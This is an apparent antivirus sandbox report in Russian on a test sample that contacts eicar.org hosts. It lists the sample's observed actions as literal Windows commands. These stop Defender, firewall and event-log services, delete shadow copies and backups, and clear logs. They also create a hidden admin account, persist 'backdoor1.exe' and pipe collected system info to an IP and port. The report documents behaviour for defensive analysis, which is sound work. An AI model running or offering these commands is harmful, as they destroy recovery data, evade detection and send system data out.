Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SecurityHealthService] 'Start' = '00000001'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\wscsvc] 'start' = '00000001'
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Диспетчера задач (Taskmgr)
- Центр обеспечения безопасности (Security Center)
- Системный антивирус (Защитник Windows)
блокирует:
- Средство контроля пользовательских учетных записей (UAC)
- Центр обеспечения безопасности (Security Center)
удаляет теневые копии разделов.
Запускает на исполнение
- '%WINDIR%\syswow64\net.exe' stop "wuauserv"
- '%WINDIR%\syswow64\net.exe' stop "wscsvc"
- '%WINDIR%\syswow64\net.exe' stop "Sense"
- '%WINDIR%\syswow64\net.exe' stop "WdNisSvc"
- '%WINDIR%\syswow64\net.exe' stop "WinDefend"
- '%WINDIR%\syswow64\net.exe' stop "mpssvc"
- '%WINDIR%\syswow64\net.exe' stop "EventLog"
- '%WINDIR%\syswow64\net.exe' stop "WSearch"
- '%WINDIR%\syswow64\net.exe' stop "SDRSVC"
- '%WINDIR%\syswow64\net.exe' stop "SecurityHealthService"
- '%WINDIR%\syswow64\net.exe' stop "DPS"
- '%WINDIR%\syswow64\net.exe' stop "EFS"
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\nsh8f16.tmp
- %TEMP%\nsm954e.tmp\inetc.dll
- C:\potentiallyunwanted.exe
- %TEMP%\nsm954e.tmp\nsexec.dll
- %TEMP%\info.txt
Сетевая активность
Подключается к
- 'se####.eicar.org':443
- 'am###.eicar.org':443
- 'am###.eicar.org':80
TCP
Запросы HTTP GET
- http://am###.eicar.org/PotentiallyUnwanted.exe
Другие
- 'se####.eicar.org':443
- 'am###.eicar.org':443
UDP
- DNS ASK se####.eicar.org
- DNS ASK am###.eicar.org
Другое
Ищет следующие окна
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' schtasks /DELETE /TN gimotti /F' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c getmac /v >> %TEMP%\info.txt' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c systeminfo >> %TEMP%\info.txt' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c net localgroup administrators admin /add' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c net user admin /add' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c net user administrator /active:yes' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "EFS"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "DPS"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "SecurityHealthService"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c net user >> %TEMP%\info.txt' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "SDRSVC"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "EventLog"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "mpssvc"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "WinDefend"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "WdNisSvc"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "Sense"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "wscsvc"' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "wuauserv"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' powershell start-process powershell -verb runas' (со скрытым окном)
- '%WINDIR%\syswow64\net.exe' stop "WSearch"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\svchost.exe -w 2 192.168.244.129 8888 < %TEMP%\info.txt' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' schtasks /DELETE /TN gimotti /F
- '%WINDIR%\syswow64\cmd.exe' /c getmac /v >> %TEMP%\info.txt
- '%WINDIR%\syswow64\getmac.exe' /v
- '%WINDIR%\syswow64\cmd.exe' /c net user >> %TEMP%\info.txt
- '%WINDIR%\syswow64\net.exe' user
- '%WINDIR%\syswow64\net1.exe' user
- '%WINDIR%\syswow64\cmd.exe' schtasks /CREATE /tn "malware" /TR "C:\backdoor1.exe" /SC daily /st 09:00:00 /ru "system"
- '%WINDIR%\syswow64\cmd.exe' bcdedit /set {default} recoveryenabled no
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\svchost.exe -w 2 192.168.244.129 8888 < %TEMP%\info.txt
- '%WINDIR%\syswow64\cmd.exe' wbadmin delete systemstatebackup -keepversion:()
- '%WINDIR%\syswow64\cmd.exe' schtasks.exe /create /RU SYSTEM /F /RL HIGHEST /TR "%ProgramFiles(x86)%\Naver\Naver Whale\Application\2.7.98.22\whale_update.exe" !@Whale:TheBestBrowserEver@!" /TN WhaleUpdateD /SC DAILY /DU 24...
- '%WINDIR%\syswow64\net1.exe' stop "EFS"
- '%WINDIR%\syswow64\cmd.exe' wbadmin delete backup
- '%WINDIR%\syswow64\cmd.exe' wbadmin delete catalog -quiet
- '%WINDIR%\syswow64\cmd.exe' wbadmin delete systemstatebackup
- '%WINDIR%\syswow64\cmd.exe' wmic shadowcopy delete
- '%WINDIR%\syswow64\cmd.exe' vssadmin delete shadows /all /quiet
- '%WINDIR%\syswow64\wevtutil.exe' clear-log Application
- '%WINDIR%\syswow64\wevtutil.exe' clear-log Security
- '%WINDIR%\syswow64\wevtutil.exe' clear-log System
- '%WINDIR%\syswow64\sc.exe' config EventLog start= disabled
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_CURENT_USER\Software\Microsoft\Terminal Server Client\Server" /f
- '%WINDIR%\syswow64\net.exe' localgroup administrators admin /add
- '%WINDIR%\syswow64\net1.exe' localgroup administrators admin /add
- '%WINDIR%\syswow64\systeminfo.exe'
- '%WINDIR%\syswow64\net1.exe' user admin /add
- '%WINDIR%\syswow64\net.exe' user admin /add
- '%WINDIR%\syswow64\net1.exe' stop "wuauserv"
- '%WINDIR%\syswow64\net1.exe' stop "wscsvc"
- '%WINDIR%\syswow64\net1.exe' stop "Sense"
- '%WINDIR%\syswow64\net1.exe' stop "WdNisSvc"
- '%WINDIR%\syswow64\net1.exe' stop "WinDefend"
- '%WINDIR%\syswow64\net1.exe' stop "mpssvc"
- '%WINDIR%\syswow64\net1.exe' stop "EventLog"
- '%WINDIR%\syswow64\net1.exe' stop "WSearch"
- '%WINDIR%\syswow64\net1.exe' stop "SDRSVC"
- '%WINDIR%\syswow64\net1.exe' stop "SecurityHealthService"
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
- '%WINDIR%\syswow64\cmd.exe' bcdedit /set {default} bootstatuspolicy ignoreallfailures
- '%WINDIR%\syswow64\net1.exe' stop "DPS"
- '%WINDIR%\syswow64\cmd.exe' sc create malservice binPath= "c:\backdoor1.exe" start= auto<SYSTEM32>
- '%WINDIR%\syswow64\rundll32.exe' javascript:"\..\mshtml,RunHTMLApplication ";
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' GET-ExecutionPolicy ByPass -File "%ProgramFiles%\AVG\Antivirus\setup\UninstallExchange.ps1" "%ProgramFiles%\AVG\Antivirus\AsEx.dll"
- '%WINDIR%\syswow64\cmd.exe' netsh advfirewall firewall add rule name="RAONKSVC" dir=in action=allow program="%ALLUSERSPROFILE%\RAONWIZ\RAON K\raonk.svc.exe" enable=yes
- '%WINDIR%\syswow64\cmd.exe' /c net user administrator /active:yes
- '%WINDIR%\syswow64\cmd.exe' /c net user admin /add
- '%WINDIR%\syswow64\cmd.exe' /c net localgroup administrators admin /add
- '%WINDIR%\syswow64\cmd.exe' /c systeminfo >> %TEMP%\info.txt
- '%WINDIR%\syswow64\net.exe' user administrator /active:yes
- '%WINDIR%\syswow64\net1.exe' user administrator /active:yes
- '%WINDIR%\syswow64\cmd.exe' powershell start-process powershell -verb runas
- '%WINDIR%\syswow64\cmd.exe' reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mal /t REG_SZ /d "C:\backdoor1.exe"
- '%WINDIR%\syswow64\attrib.exe' "%userprofile%\documents\Default.rdp" -s -h
